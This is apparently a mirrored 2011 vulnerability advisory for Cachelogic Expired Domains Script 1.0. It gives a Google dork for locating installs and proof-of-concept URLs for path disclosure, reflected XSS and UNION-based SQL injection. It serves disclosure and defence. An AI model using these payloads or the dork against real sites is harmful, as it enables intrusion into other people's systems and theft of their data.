Cachelogic Expired Domains Script 1.0 Multiple Vulnerabilities
| EKU-ID: 596 | CVE: | OSVDB-ID: |
| Author: Brendan Coles | Published: 2011-06-23 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 596 | CVE: | OSVDB-ID: |
| Author: Brendan Coles | Published: 2011-06-23 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Cachelogic Expired Domains Script 1.0 multiple security vulnerabilities
# Date: 2011-06-22
# Author: Brendan Coles <bcoles@gmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>>
# Advisory: http://itsecuritysolutions.org/2011-03-24_Cachelogic_Expired_Domains_Script_1.0_multiple_security_vulnerabilities/
# Software: Cachelogic Expired Domains Script
# Version: <= 1.0
# Google Dork: allinurl:page domain ext filter hyphen numbers ncharacter
# Vendor: CacheLogic
# Homepage: http://cachelogic.net/
# Notified: 2011-03-20 (patched 2011-03-24)
# Full Path Disclosure:
http://localhost/[PATH]/index.php?page[]
http://localhost/[PATH]/index.php?domain[]
http://localhost/[PATH]/index.php?ext[]
http://localhost/[PATH]/index.php?filter[]
http://localhost/[PATH]/index.php?hyphen[]
http://localhost/[PATH]/index.php?numbers[]
http://localhost/[PATH]/index.php?ncharacter[]
http://localhost/[PATH]/index.php?ncharacter='
http://localhost/[PATH]/index.php?searchdays[]
http://localhost/[PATH]/index.php?action[]
# Reflected Cross-Site Scripting (XSS):
http://localhost/[PATH]/stats.php?name="><script>alert(1)</script><p+"
http://localhost/[PATH]/stats.php?ext="><script>alert(1)</script><p+"
# SQL Injection:
http://localhost/[PATH]/index.php?ncharacter=-1+union+select+@@version,null,null--